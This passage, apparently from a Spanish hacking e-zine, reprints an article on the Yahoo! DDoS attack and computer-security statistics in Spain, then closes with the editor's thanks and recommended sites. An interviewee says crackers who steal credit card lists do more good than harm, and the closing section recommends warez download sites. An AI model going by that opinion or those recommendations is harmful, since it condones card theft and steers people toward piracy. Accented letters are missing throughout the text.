La seguridad en Internet es asunto difcil, ya que todos dependen de todos y se es tan fuerte como el eslabn ms dbil de la cadena. El ataque contra Yahoo!, llamado de Denegacin Distribuida de Servicio (DDoS), consisti en entrar previamente en unos cuantos ordenadores con conexiones potentes (universidades, empresas...), e instalarles un programa. A una orden del atacante, todos se lanzaron contra el objetivo, enmascarando adems sus direcciones de origen (lo que se llama IP Spoofing), por lo que resultaba muy difcil saber de donde venan los tiros. "Si tienes una mquina insegura, puede que no te afecte, es tuya, pero es que tambin puede servir para lanzar ataques contra otras que no tienen la culpa. Lo injusto de los DoS es que, por muy bueno que seas y muy preocupado que ests por la seguridad, no puedes evitarlo. La leccin de esto no es slo que Internet sea vulnerable y est en paales, sino que hay cantidad de mquinas y redes importantes, como las universidades, que no se preocupan", afirma Jess Cea, experto en seguridad y administrador de sistemas, quien sufre una media de un ataque de Denegacin de Servicio por semana. Cea, moderador de la nica lista de discusin pblica sobre 'hacking' en castellano, considera que estas acciones no tienen nada que ver con los 'hackers', aunque reconoce su utilidad para demostrar que hay cosas a mejorar: "Los 'crackers' que muestran fallos de seguridad, cambian pginas en webs o roban listas de tarjetas de crdito en general hacen ms bien que mal, porque demuestran que no es oro todo lo que reluce y que los programas tienen fallos. Que caigan mquinas, si as se dan cuenta". Segn Cea, los administradores de estos sistemas tienen parte de culpa, pero tambin las empresas, que "nunca les piden experiencia en seguridad", o los usuarios, que "slo ven la parte negativa de las polticas de seguridad, la incomodidad de, por ejemplo, tener que utilizar claves difciles". Parecida opinin muestra Jordi Linares, de la seccin espaola del Computer Emergency Response Team, la llamada "polica de Internet": "Si se entendiese la seguridad como un proceso y no como un estado, se podran evitar muchos incidentes. Todos los problemas que tratamos son de fallos ya descubiertos, de los que se ha advertido a veces hace aos y pueden repararse con un parche". Al esCERT se dirigen las empresas que sufren accesos no autorizados a sus ordenadores, intentos de entrada, ataques de Denegacin de Servicio y otros. Aunque el ao pasado atendieron 43 casos, la cifra de incidentes reales es muy superior y difcil de determinar, ya que muchas empresas los

solucionan ellas mismas, como la de Jess Cea, que asegura no haber denunciado nunca ningn ataque. De todas formas, las estadsticas del esCERT son una pintura a pequea escala del panorama: suben los incidentes, realizados con instrumentos automatizados, y se hacen ms graves. En el caso de los DoS, asegura Linares, "antes afectaban a un servicio concreto de una mquina ('mail bombing', 'syn flood'), mientras que ahora paran el funcionamiento de toda la mquina o de toda la red". La situacin es parecida en las universidades, aunque all los incidentes se cuadriplican y crecen a ritmo de un 47%, debido a su tradicional obertura y descuido en la administracin de sistemas. De enero a octubre de 1999, el CERT de la red acadmica RedIris atendi 162 casos, ms 78 por correo basura o "spam". Casi la mitad no se solucionan nunca. No debe extraar entonces que, en la mayora de intrusiones informticas investigadas por las fuerzas de la ley, las universidades se lleven parte del protagonismo. Los accesos ilegales a ordenadores han subido en las estadsticas que maneja el Grupo de Delitos de Alta Tecnologa de la Guardia Civil, usualmente tipificados como revelacin de secretos y daos, el 43% del total. El fraude electrnico (9,5%), los delitos contra la propiedad industrial (14,3%) y la propiedad intelectual (19,5%) completan el reparto. "En Espaa estamos comenzando a sufrir este tipo de delitos y se est produciendo un incremento exponencial. De una media semanal de 2 casos investigados a finales de 1996 se pasa a finales de 1999 a un volumen de 25 casos semanales", asegura el capitn Anselmo del Moral, en un reciente artculo de la revista interna de la Guardia Civil. El rumor empieza tambin a correr, ya casi un clamor despus del caso Yahoo!, en crculos profesionales y de empresa. "El mercado de seguridad informtica va para arriba. En tres aos habr un buen ritmo. Las compaas deberan preocuparse de comprar servicio externo e interno", asegura Jos de la Pea, director de la revista "Seguridad en Informtica y Comunicaciones (SIC)". Aunque en Estados Unidos ya ha despegado, en Espaa se empieza desde "volmenes ridculos: hay muy pocas empresas con capital espaol dedicadas a crear productos o consultora, se cuentan con los dedos de la mano. La compra de soluciones de seguridad no ha empezado hasta el segundo trimestre de 1999", explica De la Pea. De todas formas, la compra no es siempre la mejor o nica solucin, ya que hay muchos programas libres de anlisis y defensa, por ser un tema que interesa a los 'hackers'.

Mantener una poltica de seguridad es el reto no superado en las empresas, incluso "en las que dan servicios basados en tecnologa, que no cuidan que sean seguros", recrimina el periodista. Aunque el problema no es slo la concienciacin de la compaa, dice De la Pea, sino tambin la poca oferta actual de buenos profesionales: "No hay", se queja.

Incidentes como el ataque de Denegacin de Servicio contra Yahoo! son tiles para despertar la consciencia dormida sobre la necesidad de una mayor seguridad informtica en los ordenadores de empresas y organismos. Hace diez aos, los sistemas conectados a la red eran totalmente abiertos, pero con cada nuevo incidente se han ido cerrando, hasta hoy, cuando es comnmente aceptado que, por su propio bien y el de sus vecinos, una empresa debe tener la seguridad entre sus principales prioridades.

La consultora Ernst&Young realiza la nica encuesta pblica sobre el estado de esta cuestin en Espaa. Sus ltimos resultados, correspondientes a 1998, no son muy tranquilizadores: el 80% de compaas no tienen establecido un plan de accin ante un problema de seguridad informtica, slo una de cada siete cifra su informacin confidencial y el 56% no investiga los intentos de acceso o actividades poco usuales en sus redes. Mientras la seguridad es dejada aparte, crecen como la espuma las nuevas empresas que entran en la red (en 1998 el porcentaje subi del 27% al 84%). Algunas (el 53%) aseguran tener una poltica de seguridad, sin especificar si realmente obligan a cumplirla. Como afirma el informe, "la importancia que se da a la seguridad informtica no siempre va unida a la implantacin de medidas concretas". Segn los empresarios, los principales obstculos para mejorar la fiabilidad de sus sistemas son el presupuesto (36%) y la concienciacin de los empleados (el 32%).

Primero que nada, gracias a todos los cibernautas que han descargado la revista. Quiero mandarle un saludo a mis colegas; Fidelito601, quien creo junto a mi esta e-zine, JonyFC, un compaero, el cual siempre esta dispuesto a escuchar, BcBonilla,

compaero de trabajo, CCX42, compaero de trabajo, OTA, y GP, quienes me han enseado mucho con respecto a los sistemas operativos, LUK & Clarinetista, de HackHispano, que siempre han dado una respuesta con respecto a mis dudas, entre otros. Todas estas personas, son con las que he pasado buenos y malos momentos, y con esta revista pretendo agradecerles a todas estas personas, por su gran apoyo. Actualmente, muchas personas, al preguntarme sobre el Hacking, consecuentemente a la pregunta, viene otra, pidindome que les diga, donde he aprendido todo lo que se sobre el Hacking y otras ramas de la informtica, por ese motivo quiero recomendar una serie de webs las cuales seguro les ayudaran a ampliar sus conocimientos. www.HackHispano.com www.InfiernoHacker.com www.PortalHacker.Net www.Elhacker.net www.SecurityByDefault.com www.BlackPloit.com www.EnElPc.com www.SiriusHack.Blogspot.com Ahora, quiero recomendar tres webs, en las cuales no se habla tanto de informtica (Hacking), sino que se habla ms del servicio tcnico, y en donde podras encontrar solucin a tus problemas. www.warezvirtual.com www.fullwarez.info www.clubconsolas.com Gracias a la colaboracin especial de Fidelito601. Ahora solo una cosa ms para decir.

Solo el conocimiento te hace libre.-Revista creada por SiriusBl@ck, con la colaboracin especial de Fidelito601, un gran compaero. Saludos & Suerte.